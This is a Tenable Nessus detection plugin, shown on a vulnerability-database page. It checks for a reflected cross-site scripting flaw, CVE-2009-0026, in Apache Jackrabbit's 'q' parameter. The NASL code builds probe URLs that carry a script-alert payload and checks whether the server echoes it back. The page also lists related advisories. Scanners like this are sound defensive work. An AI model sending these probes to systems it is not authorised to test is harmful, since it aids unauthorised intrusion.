Lucene search
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.APACHE_JACKRABBIT_Q_XSS.NASLHistoryJan 23, 2009 - 12:00 a.m.
Apache Jackrabbit 'q' Parameter XSS
2009-01-2300:00:00
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.
www.tenable.com
20
The remote host is running Apache Jackrabbit, an open source webapp that implements the Java Content Repository (JCR) API.
The version of Apache Jackrabbit running on the remote host fails to sanitize user input to the ‘q’ parameter of the ‘search.jsp’ and ‘swr.jsp’ pages before including it in dynamic HTML output. An attacker can exploit these issues to inject arbitrary HTML and script code into a user’s browser to be executed within the security context of the affected site.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(35452);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-0026");
script_bugtraq_id(33360);
script_xref(name:"SECUNIA", value:"33576");
script_name(english:"Apache Jackrabbit 'q' Parameter XSS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Java web application that is affected
by two cross-site scripting vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The remote host is running Apache Jackrabbit, an open source webapp
that implements the Java Content Repository (JCR) API.
The version of Apache Jackrabbit running on the remote host fails to
sanitize user input to the 'q' parameter of the 'search.jsp' and
'swr.jsp' pages before including it in dynamic HTML output. An
attacker can exploit these issues to inject arbitrary HTML and script
code into a user's browser to be executed within the security context
of the affected site.");
script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/JCR-1925");
# http://web.archive.org/web/20090418221420/http://apache.org/dist/jackrabbit/RELEASE-NOTES-1.5.2.txt
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8112eea3");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/500196/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Jackrabbit 1.5.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(79);
script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:jackrabbit");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses : XSS");
script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
port = get_http_port(default:80);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);
now = unixtime();
alert = string("<script>alert(", now, ")</script>");
ualert = urlencode(str:alert, unreserved:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/");
if (thorough_tests)
{
exploits = make_list(
string('/search.jsp?q=%25%22', ualert),
string('/swr.jsp?q=%25"', alert, '&swrnum=1')
);
}
else
{
exploits = make_list(
string('/search.jsp?q=%25%22', ualert)
);
}
# Loop through directories.
#
# nb: Jackrabbit's install directory probably won't be discovered so we'll always look under "/jackrabbit".
dirs = list_uniq(make_list("/jackrabbit", cgi_dirs()));
foreach dir (dirs)
{
foreach exploit (exploits)
{
url = string(dir, exploit);
res = http_send_recv3(method:"GET", item:url, port:port);
if (res == NULL) exit(0);
# There's a problem if we see our exploit in the form.
if (
(
"search.jsp" >< exploit &&
"Exception building query: org.apache.jackrabbit" >< res[2] &&
string('Encountered: <EOF> after : "\\"', alert, '"') >< res[2]
) ||
(
"swr.jsp" >< exploit &&
'alt="Apache Jackrabbit"' >< res[2] &&
string('results for <b>%"', alert, '</b>') >< res[2]
)
)
{
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
if (report_verbosity)
{
report = string(
"\n",
"Nessus was able to exploit the issue using the following URL :\n",
"\n",
" ", build_url(port:port, qs:url), "\n"
);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
}
| Vendor | Product | Version | CPE |
|---|---|---|---|
| apache | jackrabbit | cpe:/a:apache:jackrabbit |
Related
veracode
veracode
Cross-Site Scripting (XSS)
2018-11-09 03:04:23
seebug
seebug
Apache Jackrabbit q参数跨站脚本漏洞
2009-02-02 00:00:00
github
github
Apache Jackrabbit contains Cross-site Scripting
2022-05-02 03:12:28
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2009-01-20 00:00:00
[Full-disclosure] [ANNOUNCE] Apache Jackrabbit 1.5.2 released
2009-01-20 00:00:00
prion
prion
Cross site scripting
2009-01-21 20:30:00
osv
osv
Apache Jackrabbit contains Cross-site Scripting
2022-05-02 03:12:28
cve
cve
CVE-2009-0026
2009-01-21 20:30:00
Related for APACHE_JACKRABBIT_Q_XSS.NASL